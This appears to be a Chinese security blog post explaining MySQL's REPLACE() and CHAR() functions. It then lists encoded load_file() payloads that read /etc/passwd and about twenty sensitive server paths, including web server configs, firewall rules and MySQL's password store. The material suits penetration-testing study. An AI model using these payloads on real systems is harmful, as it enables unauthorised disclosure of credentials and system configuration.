mysql的load_file() 查看常用敏感信息文件 – 作者:Johnson666

mysql的load_file() 查看常用敏感信息文件

参考：http://www.hackdig.com/?01/hack-490.htm

replace函数使用

MySQL中替换函数 REPLACE(s，s1，s2) 使用字符串 s2 替换字符串 s 中所有的字符串 s1。

mysql> select replace('aaa.mysql.com','a','w');
+----------------------------------+
| replace('aaa.mysql.com','a','w') |
+----------------------------------+
| www.mysql.com                    |
+----------------------------------+

由运行结果可以看出，使用 REPLACE('aaa.mysql.com'，'a'，'w') 将“aaa.mysql.com”字符串的“a”字符替换为“w”字符，结果为“www.mysql.com”。

char函数使用

CHAR– 将每个参数N解释为整数，并返回由这些整数的代码值所给定的字符组成的字符串。 跳过NULL值。

语法

CHAR(N,... [USING charset_name])

例子：

mysql> select char(77,'121',83,81,NULL,'76');
+--------------------------------+
| char(77,'121',83,81,NULL,'76') |
+--------------------------------+
| MySQL                          |
+--------------------------------+
1 row in set (0.02 sec)

M的ASCII码值为77，以此类推。

mysql> select char(77,'121',83,81,NULL,'255555');
+------------------------------------+
| char(77,'121',83,81,NULL,'255555') |
+------------------------------------+
| MySQ�C                            |
+------------------------------------+
1 row in set (0.03 sec)

常用敏感信息文件

（记得要加select）

1、replace(load_file(0×2F6574632F706173737764), 0x3c, 0x20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一些php文件里完全显示代码。有些时候不替换一些字符，如”<“替换成”空格”,返回的是网页。

而无法查看到代码。

3、load_file(char(47))可以列出FreeBSD, Sunos系统根目录。

4、/etc/httpd/conf/httpd.conf或者/usr/local/apache/conf/httpd.conf查看linux apache虚拟主机配置文件。

5、c:/Program Files/Apache Group/Apache/conf/httpd.conf或c:/apache/conf/httpd.conf 查看windows系统

apache文件。

6、c:/Resin-3.0.14/conf/resin.conf 或c:/Resin/conf/resin.conf 查看jsp开发网站的resin文件配置信息。

7、/usr/local/resin/conf/resin.cof 查看linux系统配置的JSP虚拟主机

8、d:/apache/apache2/conf/httpd.conf

9、c:/Program Files/mysql.my.ini

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

11、c:/windows/system32/inetsrv/MetaBase.xml 查看IIS的虚拟主机配置文件

12、/usr/local/resin-3.0.22/conf/resin.conf 或/usr/local/resin-pro-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

13、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

14、/etc/sysconfig/iptables 查看防火墙策略

15、usr/local/app/php5/lib/php.ini PHP 的设置

16、/etc/my.cnf MYSQL在启动时候要加载的配置文件

17、/etc/redhat-release 红帽子的系统版本

18、c:/mysql/data/mysql/user.MYD 存在MYSQL系统中的用户密码

19、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP

20、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf 虚拟网站设置

21、c:/windows/my.ini

来源：freebuf.com 2021-02-27 21:21:52 by: Johnson666